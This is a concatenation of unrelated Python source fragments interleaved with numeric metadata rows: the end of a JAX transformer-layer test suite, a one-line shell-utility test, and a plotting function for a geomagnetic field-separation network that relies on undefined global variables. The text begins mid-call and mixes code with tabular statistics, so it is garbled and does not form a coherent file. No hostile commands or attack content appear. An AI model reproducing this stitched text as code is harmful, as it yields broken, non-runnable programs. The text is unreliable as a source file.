segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
outputs_repeated = repeated_transformer_layer.FProp(
stacked_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
self.assertAllClose(outputs, outputs_repeated)
@parameterized.parameters(*list(itertools.product([True, False], repeat=5)))
def test_stacked_transformer_layer_extendstep(self, packed_input,
cross_attention,
enable_while_loop,
use_repeat_layer, combine_qkv):
if cross_attention and combine_qkv:
self.skipTest('combine_qkv optimization only works for self-attention')
if use_repeat_layer:
layer_params = transformers.StackedTransformerLayersRepeated.Params()
else:
layer_params = transformers.StackedTransformerLayers.Params()
p = layer_params.Set(
name='jax_transformer_layer',
model_dims=8,
hidden_dims=32,
num_heads=2,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention,
num_layers=2,
enable_while_loop=enable_while_loop)
p.transformer_layer_params_tpl.tr_atten_tpl.combine_qkv = combine_qkv
seq_len = 5
batch_size = 4
stacked_transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = stacked_transformer_layer.InstantiateVariables(prng_key)
initial_states = stacked_transformer_layer.InitStates(
initial_vars, batch_size, seq_len)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
attention_mask = attentions.ConvertPaddingsToMask(paddings)
segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 32)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
prng_key = jax.random.PRNGKey(seed=123)
global_step = jnp.array(0, dtype=jnp.uint64)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=global_step):
fprop_outputs = stacked_transformer_layer.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
decoder_outputs = jnp.zeros(shape=[seq_len, batch_size, p.model_dims])
atten_states = initial_states
for t in range(seq_len):
segment_mask_t = attention_mask[:, :, t, :]
cross_segment_mask_t = cross_segment_mask
if segment_mask is not None:
segment_mask_t = jnp.minimum(segment_mask_t, segment_mask[:, :, t, :])
if cross_segment_mask is not None:
cross_segment_mask_t = cross_segment_mask[:, :, t, :]
atten_states, encoded = stacked_transformer_layer.ExtendStep(
initial_vars,
atten_states,
inputs=inputs[:, t, :],
time_step=t,
segment_mask=segment_mask_t,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask_t)
decoder_outputs = decoder_outputs.at[t].set(encoded)
decoder_out_transposed = jnp.transpose(decoder_outputs, [1, 0, 2])
logging.info('initial_vars in transformer layer = %s', initial_vars)
np_fprop_outputs = test_utils.ToNp(fprop_outputs)
np_decoder_outputs = test_utils.ToNp(decoder_out_transposed)
self.assertAllClose(np_fprop_outputs, np_decoder_outputs, atol=1e-5)
@parameterized.parameters((True, True), (False, True), (True, False),
(False, False))
def test_stacked_transformer_layer_while_loop(self, packed_input,
cross_attention):
num_layers = 2
p1 = transformers.StackedTransformerLayers.Params().Set(
name='jax_transformer_layer',
model_dims=8,
hidden_dims=32,
num_heads=2,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention,
num_layers=num_layers,
enable_while_loop=False)
p2 = transformers.StackedTransformerLayers.Params().Set(
name='jax_transformer_layer',
model_dims=8,
hidden_dims=32,
num_heads=2,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention,
num_layers=num_layers,
enable_while_loop=True)
seq_len = 5
batch_size = 4
layer1 = p1.Instantiate()
layer2 = p2.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = layer1.InstantiateVariables(prng_key)
layer2.InstantiateVariableConfigs()
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p1.model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 32)
npy_cross_inputs = np.random.normal(
1.0, 0.5,
[batch_size, cross_seq_len, p1.model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
prng_key = jax.random.PRNGKey(seed=123)
global_step = jnp.array(0, dtype=jnp.uint64)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=global_step):
fprop_outputs_1 = layer1.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
fprop_outputs_2 = layer2.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
np_fprop_outputs_1 = test_utils.ToNp(fprop_outputs_1)
np_fprop_outputs_2 = test_utils.ToNp(fprop_outputs_2)
logging.info('np_fprop_outputs_1: %s', np_fprop_outputs_1)
logging.info('np_fprop_outputs_2: %s', np_fprop_outputs_2)
self.assertAllClose(np_fprop_outputs_1, np_fprop_outputs_2)
def test_transformer_bert(self):
"""Test JAX and TF transformer on PTB."""
p = transformers.TransformerLm.Params().Set(
name='bert_lm',
model_dims=32,
hidden_dims=4 * 32,
num_heads=4,
num_layers=1,
vocab_size=52)
p.softmax_tpl.scale_sqrt_depth = True
batch_size = 8
seq_len = 512
bert_lm = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = bert_lm.InstantiateVariables(prng_key)
input_ids = jax.random.randint(
jax.random.PRNGKey(1234), [batch_size, seq_len], 0, 51)
input_paddings = jnp.zeros([batch_size, seq_len])
input_weights = jnp.ones([batch_size, seq_len])
input_segment_ids = jnp.ones([batch_size, seq_len])
input_segment_pos = jnp.tile(
jnp.arange(0, seq_len)[jnp.newaxis, :], [batch_size, 1])
labels = py_utils.NestedMap()
labels.class_ids = input_ids
labels.class_weights = input_weights
with base_layer.JaxContext.NewContext(
prng_key=jax.random.PRNGKey(seed=1234),
global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = bert_lm.FProp(
initial_vars,
input_ids,
input_paddings,
labels=labels,
segment_ids=input_segment_ids,
segment_pos=input_segment_pos)
logging.info('outputs: %s', outputs)
@parameterized.parameters(('RELU',), ('GATED_SILU',))
def test_gated_ffwd(self, activation_function):
"""Test JAX and TF transformer on PTB."""
p = transformers.TransformerFeedForwardLayer.Params().Set(
name='ffwd',
input_dims=8,
hidden_dims=32,
activation=activation_function)
batch_size = 8
seq_len = 512
ffwd = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = ffwd.InstantiateVariables(prng_key)
inputs = jax.random.normal(
jax.random.PRNGKey(1234), [batch_size, seq_len, 8])
input_paddings = jnp.zeros([batch_size, seq_len])
with base_layer.JaxContext.NewContext(
prng_key=jax.random.PRNGKey(seed=1234),
global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = ffwd.FProp(initial_vars, inputs, input_paddings)
logging.info('outputs: %s', outputs)
if __name__ == '__main__':
absltest.main()
| 42.11437
| 80
| 0.683727
| 3,626
| 28,722
| 5.068395
| 0.07722
| 0.04908
| 0.032212
| 0.021221
| 0.826205
| 0.793449
| 0.773207
| 0.753455
| 0.722385
| 0.700729
| 0
| 0.019601
| 0.225541
| 28,722
| 681
| 81
| 42.176211
| 0.8066
| 0.034642
| 0
| 0.703226
| 0
| 0
| 0.028744
| 0.007258
| 0
| 0
| 0
| 0
| 0.009677
| 1
| 0.016129
| false
| 0
| 0.024194
| 0
| 0.043548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8febccaf8d552aad4e79fa7dbb83ba6ab02b36b6
| 149
|
py
|
Python
|
tests/test_simple_shell.py
|
jaden-git/simple-utils
|
8526ea9a8357665722627ab2c44da527c2884006
|
[
"Apache-2.0"
] | 1
|
2021-03-08T09:54:05.000Z
|
2021-03-08T09:54:05.000Z
|
tests/test_simple_shell.py
|
jaden-git/simple-utils
|
8526ea9a8357665722627ab2c44da527c2884006
|
[
"Apache-2.0"
] | null | null | null |
tests/test_simple_shell.py
|
jaden-git/simple-utils
|
8526ea9a8357665722627ab2c44da527c2884006
|
[
"Apache-2.0"
] | null | null | null |
import simple_utils
def test_dynamic_check_output():
    assert simple_utils.shell.dynamic_check_output('cat assets/message.txt') == 'Hello World'
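# Editorial note (assumption): this test presumes the repository provides an
# assets/message.txt file whose contents are exactly 'Hello World', and that
# simple_utils.shell.dynamic_check_output runs the given command and returns
# its stdout as a str (apparently with any trailing newline removed, given the
# exact-match assertion above).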
| 24.833333
| 93
| 0.791946
| 21
| 149
| 5.285714
| 0.761905
| 0.198198
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107383
| 149
| 5
| 94
| 29.8
| 0.834586
| 0
| 0
| 0
| 0
| 0
| 0.222973
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8f0c1710b2a6ea940670b17d354459811d2e37e2
| 16,826
|
py
|
Python
|
utility_active.py
|
mikkelotzen/mikkel_tools
|
d3f4bc70f8863038b0216d47b0bd3cb830e63132
|
[
"BSD-3-Clause"
] | null | null | null |
utility_active.py
|
mikkelotzen/mikkel_tools
|
d3f4bc70f8863038b0216d47b0bd3cb830e63132
|
[
"BSD-3-Clause"
] | null | null | null |
utility_active.py
|
mikkelotzen/mikkel_tools
|
d3f4bc70f8863038b0216d47b0bd3cb830e63132
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as tick
# Color
from matplotlib.colors import LinearSegmentedColormap
import cartopy.crs as ccrs
projection = ccrs.Mollweide(central_longitude=0)
import matplotlib.colors as colors
color_zesty_cbf = [(0.0, 0.10980392156862745, 0.30196078431372547),
                   (0.5019607843137255, 0.6862745098039216, 1.0),
                   (1, 1, 1),
                   (1.0, 0.5372549019607843, 0.30196078431372547),
                   (0.30196078431372547, 0.10196078431372549, 0.0)]  # dark bluish -> bright blue -> white -> bright orange -> darker orange
cm_zesty_cbf = LinearSegmentedColormap.from_list("zesty_cbf", color_zesty_cbf, N=10001)
class MidpointNormalize(colors.Normalize):
    def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
        self.midpoint = midpoint
        colors.Normalize.__init__(self, vmin, vmax, clip)

    def __call__(self, value, clip=None):
        x, y = [self.vmin, self.midpoint, self.vmax], [0.0, 0.5, 1.0]
        return np.ma.masked_array(np.interp(value, x, y))
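# --- Editorial usage sketch (not part of the original module) ---
# MidpointNormalize is typically passed as `norm=` to scatter/imshow so that a
# chosen data value (here 0.0) maps to the middle of the colormap, i.e. the
# white band of cm_zesty_cbf defined above. The file name and data below are
# illustrative only.
def _midpoint_norm_demo():
    data = np.random.randn(50, 50) * 3 + 1  # field with a nonzero mean
    plt.imshow(data, cmap=cm_zesty_cbf,
               norm=MidpointNormalize(vmin=data.min(), vmax=data.max(), midpoint=0.0))
    plt.colorbar()
    plt.savefig("midpoint_norm_demo.png", dpi=100, bbox_inches='tight')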
def plot_while_learning(epoch):
# Plot learning curve
fig = plt.figure(figsize=(9,9), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(1, 2) # Add 1x2 grid
ax1 = fig.add_subplot(gs[0, :])
# Finalize plots
ax1.clear()
ax1.set_title('Error CN')
ax1.set_xlabel("Epoch")
ax1.set_xlim([np.min(epoch_range),N_epochs])
#ax1.set_ylim([0.0,np.max([E_valid_collect,E_train_collect])])
ax1.grid()
ax1.semilogy(epoch_range, E_train_collect[:,0], '-', color="C0", label = "E training")
ax1.semilogy(epoch_range, E_valid_collect[:,0], '--', color="C0", label = "E validation")
ax1.semilogy(epoch_range, C_train_collect[:,0], '-', color="C1", label = "C training")
ax1.semilogy(epoch_range, C_valid_collect[:,0], '--', color="C1", label = "C validation")
ax1.semilogy(epoch_range, Li_train_collect[:,0], '-', color="C2", label = "Li training")
ax1.semilogy(epoch_range, Li_valid_collect[:,0], '--', color="C2", label = "Li validation")
ax1.semilogy(epoch_range, sat_train_collect[:,0], '-', color="C3", label = "sat training")
ax1.semilogy(epoch_range, sat_valid_collect[:,0], '--', color="C3", label = "sat validation")
ax1.text(0.5, 0.9, "Current lr: " + str(optimizer.param_groups[0]["lr"]),
horizontalalignment='center', verticalalignment='center', transform=ax1.transAxes)
ax1.legend(loc="upper right")
fig.canvas.draw()
fig.savefig('nets/training_sequences/training_test_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot validation batch RMSE
sat_p = sat_in_v[:,:].permute(1,0).detach().cpu().numpy()
C_op = C_ov[:,:].permute(1,0).detach().cpu().numpy()
Li_op = Li_ov[:,:].permute(1,0).detach().cpu().numpy()
C_lp = C_lv[:,:].permute(1,0).detach().cpu().numpy()
Li_lp = Li_lv[:,:].permute(1,0).detach().cpu().numpy()
# Label
clip_op = Li_op.copy()
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max),:]
clip_lp = Li_lp.copy()
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max),:]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
rmse_v_b = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=1))
rmse_v = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=0))
fig = plt.figure(figsize=(9,9), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(1, 2)
ax1 = fig.add_subplot(gs[0, 0])
ax1.clear()
ax1.set_title("Validation sat obs RMSE, mean over batch")
ax1.set_xlabel("[nT]")
ax1.set_ylabel("Count")
ax1.grid()
ax1.hist(rmse_v_b.reshape(-1),bins=21)
ax2 = fig.add_subplot(gs[0, 1])
ax2.clear()
ax2.set_title("Validation sat obs RMSE, mean over obs")
ax2.set_xlabel("[nT]")
ax2.set_ylabel("Count")
ax2.grid()
ax2.hist(rmse_v.reshape(-1),bins=21)
fig.canvas.draw()
fig.savefig('nets/training_sequences/rmse_val_test_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot training batch RMSE
sat_p = sat_in_t[:,:].permute(1,0).detach().cpu().numpy()
C_op = C_ot[:,:].permute(1,0).detach().cpu().numpy()
Li_op = Li_ot[:,:].permute(1,0).detach().cpu().numpy()
C_lp = C_lt[:,:].permute(1,0).detach().cpu().numpy()
Li_lp = Li_lt[:,:].permute(1,0).detach().cpu().numpy()
# Label
clip_op = Li_op.copy()
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max),:]
clip_lp = Li_lp.copy()
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max),:]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
rmse_v_b = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=1))
rmse_v = np.sqrt(np.mean((sat_lp-sat_op)**2,axis=0))
fig = plt.figure(figsize=(9,9), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(1, 2)
ax1 = fig.add_subplot(gs[0, 0])
ax1.clear()
ax1.set_title("Training sat obs RMSE, mean over batch")
ax1.set_xlabel("[nT]")
ax1.set_ylabel("Count")
ax1.grid()
ax1.hist(rmse_v_b.reshape(-1),bins=21)
ax2 = fig.add_subplot(gs[0, 1])
ax2.clear()
ax2.set_title("Training sat obs RMSE, mean over obs")
ax2.set_xlabel("[nT]")
ax2.set_ylabel("Count")
ax2.grid()
ax2.hist(rmse_v.reshape(-1),bins=21)
fig.canvas.draw()
fig.savefig('nets/training_sequences/rmse_tra_test_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot fit training
fig = plt.figure(figsize=(9,6), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(3, 3) # Add 3x3 grid
ax1 = fig.add_subplot(gs[0, 0], projection=projection)
ax2 = fig.add_subplot(gs[0, 1], projection=projection)
ax12 = fig.add_subplot(gs[0, 2])
ax3 = fig.add_subplot(gs[1, 0], projection=projection)
ax4 = fig.add_subplot(gs[1, 1], projection=projection)
ax34 = fig.add_subplot(gs[1, 2])
ax5 = fig.add_subplot(gs[2, 0], projection=projection)
ax6 = fig.add_subplot(gs[2, 1], projection=projection)
ax56 = fig.add_subplot(gs[2, 2])
sat_p = sat_in_t[0,:].detach().cpu().numpy()
C_op = C_ot[0,:].detach().cpu().numpy()
Li_op = Li_ot[0,:].detach().cpu().numpy()
C_lp = C_lt[0,:].detach().cpu().numpy()
Li_lp = Li_lt[0,:].detach().cpu().numpy()
# Input
ax1.clear()
ax1.set_title("Li+C input obs")
im1 = ax1.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_p, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax1.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax1.axis('off')
# Label
clip_op = Li_op.copy()
#clip_op[:i_n_C] += C_op[:mt_util.shc_vec_len(20)]
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max)]
clip_lp = Li_lp.copy()
#clip_lp[:i_n_C] += C_lp
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max)]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
ax2.clear()
ax2.set_title("Net output obs")
im2 = ax2.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_op, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax2.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax2.axis('off')
ax12.clear()
ax12.set_title("Residuals")
ax12.hist((sat_op-sat_p).reshape(-1),bins=21)
# C Label
#C_lpm = Gr_C@C_lp
C_lpm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_lp[:mt_util.shc_vec_len(n_cut_max)]
ax3.clear()
ax3.set_title("Dynamo simulation core")
im3 = ax3.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax3.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax3.axis('off')
# C output
C_opm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_op[:mt_util.shc_vec_len(n_cut_max)]
#C_opm = Gr_C@C_op
ax4.clear()
ax4.set_title("Net output shc core")
im4 = ax4.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax4.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax4.axis('off')
ax34.clear()
ax34.set_title("Residuals")
ax34.hist((C_opm-C_lpm).reshape(-1),bins=21)
# Li Label
Li_lpm = Gr_Li@Li_lp
ax5.clear()
ax5.set_title("Crustal lith")
im5 = ax5.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax5.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax5.axis('off')
# Li output
Li_opm = Gr_Li@Li_op
ax6.clear()
ax6.set_title("Net output shc lith")
im6 = ax6.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax6.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax6.axis('off')
ax56.clear()
ax56.set_title("Residuals")
ax56.hist((Li_opm-Li_lpm).reshape(-1),bins=21)
# End
fig.canvas.draw()
fig.savefig('nets/training_sequences/fit_test_tra_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# Plot fit
fig = plt.figure(figsize=(9,6), constrained_layout=True) # Initiate figure with constrained layout
gs = fig.add_gridspec(3, 3) # Add 3x3 grid
ax1 = fig.add_subplot(gs[0, 0], projection=projection)
ax2 = fig.add_subplot(gs[0, 1], projection=projection)
ax12 = fig.add_subplot(gs[0, 2])
ax3 = fig.add_subplot(gs[1, 0], projection=projection)
ax4 = fig.add_subplot(gs[1, 1], projection=projection)
ax34 = fig.add_subplot(gs[1, 2])
ax5 = fig.add_subplot(gs[2, 0], projection=projection)
ax6 = fig.add_subplot(gs[2, 1], projection=projection)
ax56 = fig.add_subplot(gs[2, 2])
sat_p = sat_in_v[0,:].detach().cpu().numpy()
C_op = C_ov[0,:].detach().cpu().numpy()
Li_op = Li_ov[0,:].detach().cpu().numpy()
C_lp = C_lv[0,:].detach().cpu().numpy()
Li_lp = Li_lv[0,:].detach().cpu().numpy()
# Input
ax1.clear()
ax1.set_title("Li+C input obs")
im1 = ax1.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_p, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax1.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax1.axis('off')
# Label
clip_op = Li_op.copy()
#clip_op[:i_n_C] += C_op[:mt_util.shc_vec_len(20)]
clip_op[:mt_util.shc_vec_len(n_cut_max)] += C_op[:mt_util.shc_vec_len(n_cut_max)]
clip_lp = Li_lp.copy()
#clip_lp[:i_n_C] += C_lp
clip_lp[:mt_util.shc_vec_len(n_cut_max)] += C_lp[:mt_util.shc_vec_len(n_cut_max)]
sat_op = Gr@clip_op
sat_lp = Gr@clip_lp
ax2.clear()
ax2.set_title("Net output obs")
im2 = ax2.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=sat_op, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -5*10**4, vmax = 5*10**4
ax2.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax2.axis('off')
ax12.clear()
ax12.set_title("Residuals")
ax12.hist((sat_op-sat_p).reshape(-1),bins=21)
# C Label
#C_lpm = Gr_C@C_lp
C_lpm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_lp[:mt_util.shc_vec_len(n_cut_max)]
ax3.clear()
ax3.set_title("Dynamo simulation core")
im3 = ax3.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax3.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax3.axis('off')
# C output
C_opm = Gr_C[:,:mt_util.shc_vec_len(n_cut_max)]@C_op[:mt_util.shc_vec_len(n_cut_max)]
#C_opm = Gr_C@C_op
ax4.clear()
ax4.set_title("Net output shc core")
im4 = ax4.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=C_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -2*10**6, vmax = 2*10**6
ax4.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax4.axis('off')
ax34.clear()
ax34.set_title("Residuals")
ax34.hist((C_opm-C_lpm).reshape(-1),bins=21)
# Li Label
Li_lpm = Gr_Li@Li_lp
ax5.clear()
ax5.set_title("Crustal lith")
im5 = ax5.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_lpm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax5.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax5.axis('off')
# Li output
Li_opm = Gr_Li@Li_op
ax6.clear()
ax6.set_title("Net output shc lith")
im6 = ax6.scatter(clip.grid_phi, 90-clip.grid_theta, s=10, c=Li_opm, marker = "o",
transform=ccrs.PlateCarree(), rasterized=True, cmap=cm_zesty_cbf,
norm = MidpointNormalize(midpoint=0.0)) #, vmin = -3*10**2, vmax = 3*10**2
ax6.coastlines(linewidth = 0.2, color = (0.4,0.4,0.4))
ax6.axis('off')
ax56.clear()
ax56.set_title("Residuals")
ax56.hist((Li_opm-Li_lpm).reshape(-1),bins=21)
# End
fig.canvas.draw()
fig.savefig('nets/training_sequences/fit_test_val_{}'.format(epoch), bbox_inches='tight', dpi = 100)
# P spec
C_op = C_ot[:5,:].detach().cpu().numpy()
Li_op = Li_ot[:5,:].detach().cpu().numpy()
C_lp = C_lt[:5,:].detach().cpu().numpy()
Li_lp = Li_lt[:5,:].detach().cpu().numpy()
nmax_pairs = np.ones(5,dtype=int)*int(n_max_C)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(C_op, clip.r_cmb, n_max_C, g_spec_compares = C_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'C_test_tra_{}'.format(epoch),
save_folder="nets/training_sequences/")
nmax_pairs = np.ones(5,dtype=int)*int(n_max_Li)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(Li_op, clip.a, n_max_Li, g_spec_compares = Li_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'Li_test_tra_{}'.format(epoch),
save_folder="nets/training_sequences/")
# P spec
C_op = C_ov[:5,:].detach().cpu().numpy()
Li_op = Li_ov[:5,:].detach().cpu().numpy()
C_lp = C_lv[:5,:].detach().cpu().numpy()
Li_lp = Li_lv[:5,:].detach().cpu().numpy()
nmax_pairs = np.ones(5,dtype=int)*int(n_max_C)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(C_op, clip.r_cmb, n_max_C, g_spec_compares = C_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'C_test_val_{}'.format(epoch),
save_folder="nets/training_sequences/")
nmax_pairs = np.ones(5,dtype=int)*int(n_max_Li)
label = ["1","2","3","4","5"]
mt_util.plot_p_spec(Li_op, clip.a, n_max_Li, g_spec_compares = Li_lp, nmax_pairs = nmax_pairs,
nmax_pairs_compare = nmax_pairs, spec_style="pair_compare", figsize=(9,9), label=label,
savefig = True, save_string = 'Li_test_val_{}'.format(epoch),
save_folder="nets/training_sequences/")
| 41.648515
| 142
| 0.618507
| 2,691
| 16,826
| 3.634708
| 0.091044
| 0.007361
| 0.040078
| 0.031899
| 0.884061
| 0.854514
| 0.833044
| 0.81372
| 0.785911
| 0.736632
| 0
| 0.062045
| 0.207833
| 16,826
| 404
| 143
| 41.648515
| 0.671768
| 0.073101
| 0
| 0.738095
| 0
| 0
| 0.071553
| 0.018918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010204
| false
| 0
